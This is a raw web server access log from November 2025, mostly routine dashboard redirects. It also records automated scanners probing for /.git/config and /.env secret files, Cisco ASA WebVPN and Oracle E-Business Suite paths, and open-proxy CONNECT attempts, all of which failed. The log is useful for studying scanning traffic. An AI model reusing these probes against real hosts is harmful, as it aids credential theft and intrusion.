20.107.178.118 - - [07/Nov/2025:11:10:49 +0300] "GET / HTTP/1.1" 302 -
20.107.178.118 - - [07/Nov/2025:11:10:49 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
45.156.128.130 - - [07/Nov/2025:11:13:30 +0300] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
3.145.49.236 - - [07/Nov/2025:11:16:24 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:11:16:24 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:11:17:19 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:11:17:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.143.33.63 - - [07/Nov/2025:11:20:38 +0300] "GET / HTTP/1.0" 400 468
3.143.33.63 - - [07/Nov/2025:11:20:39 +0300] "GET / HTTP/1.0" 400 468
159.65.164.238 - - [07/Nov/2025:11:22:31 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [07/Nov/2025:11:22:37 +0300] "GET /.git/config HTTP/1.1" 404 299
196.251.83.156 - - [07/Nov/2025:11:25:24 +0300] "CONNECT 1.1.1.1:443 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:24 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:25 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:26 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:27 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:27 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:28 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:28 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
196.251.83.156 - - [07/Nov/2025:11:25:29 +0300] "CONNECT 196.251.83.156:80 HTTP/1.0" 302 - "-" "-"
44.201.177.43 - - [07/Nov/2025:11:26:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:11:26:54 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.143.33.63 - - [07/Nov/2025:11:27:14 +0300] "GET / HTTP/1.1" 302 -
3.143.33.63 - - [07/Nov/2025:11:27:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [07/Nov/2025:11:33:54 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:11:33:54 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.189.182.234 - - [07/Nov/2025:11:36:13 +0300] "GET /sBl; HTTP/1.1" 400 332
209.38.201.154 - - [07/Nov/2025:11:41:45 +0300] "GET /robots.txt HTTP/1.1" 404 299
44.201.177.43 - - [07/Nov/2025:11:41:51 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:11:41:51 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:11:43:21 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:11:43:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
49.248.192.204 - - [07/Nov/2025:11:44:48 +0300] "GET /.env HTTP/1.1" 404 298 "-" "Mozilla/5.0"
134.209.240.55 - - [07/Nov/2025:11:45:03 +0300] "GET /+CSCOL+/Java.jar HTTP/1.1" 404 299
134.209.240.55 - - [07/Nov/2025:11:45:04 +0300] "GET /+CSCOE+/logon_forms.js HTTP/1.1" 404 299
134.209.240.55 - - [07/Nov/2025:11:45:04 +0300] "GET /+CSCOL+/a1.jar HTTP/1.1" 404 299
134.209.240.55 - - [07/Nov/2025:11:45:05 +0300] "GET /+CSCOE+/transfer.js HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:11:48:47 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:11:48:47 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
